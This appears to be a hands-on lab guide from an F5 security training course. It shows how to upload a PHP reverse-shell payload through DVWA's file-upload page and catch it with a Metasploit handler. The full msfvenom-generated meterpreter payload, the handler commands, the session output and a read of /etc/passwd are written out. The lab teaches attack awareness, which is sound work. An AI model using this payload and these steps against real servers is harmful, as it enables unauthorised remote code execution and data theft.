Exploiting a Web Server
=========================================

This exploit uses some of the basic functions of the DVWA web site to
demonstrate how to hack through the site itself. A hacker would use this
as a means of circumventing your perimeter to gain access to your
applications, servers and data.

We will start by creating a pre-canned piece of php code that we will
upload to the web server through the upload function on DVWA. For this
exercise you will need to locate the external IP for your Kali server.
This IP is generated dynamically for each student but we have written a
script and an iRule on the CTF server to return the IP address you’ll
need.

On the Kali server, run the following:

msfvenom -p php/meterpreter/reverse\_tcp lport=4444 -f raw lhost=\`curl
-k https://ctf.f5lab.biz/whatismyip\`

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 14 100 14 0 0 492 0 --:--:-- --:--:-- --:--:-- 518

No platform was selected, choosing Msf::Module::Platform::PHP from the
payload

No Arch selected, selecting Arch: php from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 950 bytes

/\*<?php /\*\*/ error\_reporting(0); $ip = '<YOUR-IP>'; $port = 4444; if
(($f = 'stream\_socket\_client') && is\_callable($f)) { $s =
$f("tcp://{$ip}:{$port}"); $s\_type = 'stream'; } elseif (($f =
'fsockopen') && is\_callable($f)) { $s = $f($ip, $port); $s\_type =
'stream'; } elseif (($f = 'socket\_create') && is\_callable($f)) { $s =
$f(AF\_INET, SOCK\_STREAM, SOL\_TCP); $res = @socket\_connect($s, $ip,
$port); if (!$res) { die(); } $s\_type = 'socket'; } else { die('no
socket funcs'); } if (!$s) { die('no socket'); } switch ($s\_type) {
case 'stream': $len = fread($s, 4); break; case 'socket': $len =
socket\_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen",
$len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch
($s\_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket\_read($s, $len-strlen($b)); break; } }
$GLOBALS['msgsock'] = $s; $GLOBALS['msgsock\_type'] = $s\_type;
eval($b); die();

Highlight the section of code that was generated – from the “/\*<?php”
to the end “die;”

Open a Command prompt on the Windows PC. In the command prompt type:

CD Desktop

Notepad hackdvwa.php

|image3|

In Notepad, paste the copied code and Save and Close the file.

|image4|

Open a Web Browser and go to https://dvwa.vlab.f5demo.com

Log in with admin / password

Choose the Upload menu on the lower left

|image5|

Click ‘Choose File’ and select the hackdvwa.php file you just created on
the Desktop and click ‘Upload’

|image6|

|image7|

The file is then posted to the server and the location is displayed for
you as a means of confirmation. You can copy this and paste it at the
end of the URL in the browser.

In the browser, visit that file’s location:
http://dvwa.vlab.f5demo.com/hackable/uploads/hackdvwa.php

This will actually fail and you should see a “no socket” message, but
we’ll set that up next.

Back to the Kali ssh session we will set up the server to connect to
from the web server.

If you’re not within msfconsole anymore, start it:

msfconsole

Now we want to choose an exploit to run.

use exploit/multi/handler

To see what is selected for this exploit by default, type:

options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Exploit target:

Id Name

-- ----

0 Wildcard Target

this selects the exploit we’ll run in Metasploit

set payload php/meterpreter/reverse\_tcp

To see the options for this payload, type:

options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (php/meterpreter/reverse\_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Wildcard Target

This chooses the actual payload we’re going to send through the exploit
and we’ll set some parameters. To see the options:

show options

msf exploit(handler) > set payload php/meterpreter/reverse\_tcp

payload => php/meterpreter/reverse\_tcp

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (php/meterpreter/reverse\_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Wildcard Target

Set the options as follows:

set lhost 10.1.10.240

set lport 4444

lhost and lport
^^^^^^^^^^^^^^^

These options are the ‘local’ listening IP and port for the exploit.
Note that the IP here is the internal NAT’d IP address. In the above php
code you entered the External NAT’d address.

Return to your web browser on the Windows PC and refresh the page.

Now we can start the server:

exploit

exploit
^^^^^^^

Exploit is the fun command… here we are running the exploit we want to
see. You can also use ‘run’ but exploit is so much more Hacker.

After a few seconds, you should see:

[\*] Started reverse TCP handler on 10.1.10.240:4444

[\*] Starting the payload handler...

[\*] Sending stage (33986 bytes) to <YOURIP>

[\*] Meterpreter session 3 opened (10.1.10.240:4444 -> <IP>:PORT) at
<Date>

And then a moment or two later:

meterpreter >

Meterpreter
-----------

Meterpreter is the “Swiss Army Knife” of the Metasploit Framework. You
can open a meterpreter console up through an exploit, like we just did.
In this case, we set up Metasploit to listen for incoming traffic on
port 4444 on our NAT’d internet address. We had to do this because the
DMZ address isn’t accessible by the Web Server but it is allowed to
connect to the internet. We then run the uploaded php code we generated
which opens the connection and now we’re able to run commands on the web
server as though we had an ssh-like connection.

Let’s examine the web server so see what we can find.

In the Meterpreter shell type:

dir

We can the following:

meterpreter > dir

Listing: /var/www/dvwa/hackable/uploads

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100644/rw-r--r-- 667 fil 2013-07-08 12:55:06 -0400 dvwa\_email.png

100644/rw-r--r-- 950 fil 2017-06-19 09:11:52 -0400 hackdvwa.php

100644/rw-r--r-- 951 fil 2017-06-14 13:50:15 -0400 hackme.php.txt

We can see what accounts are on this server by typing:

cat /etc/passwd

To see a list of the commands that are available to you, you can type
*help* at any point

Feel free to investigate the web server, when you’re finished type
*exit* and the Meterpreter shell will close.

Note that when you close the session, the web page finally ends
spinning.
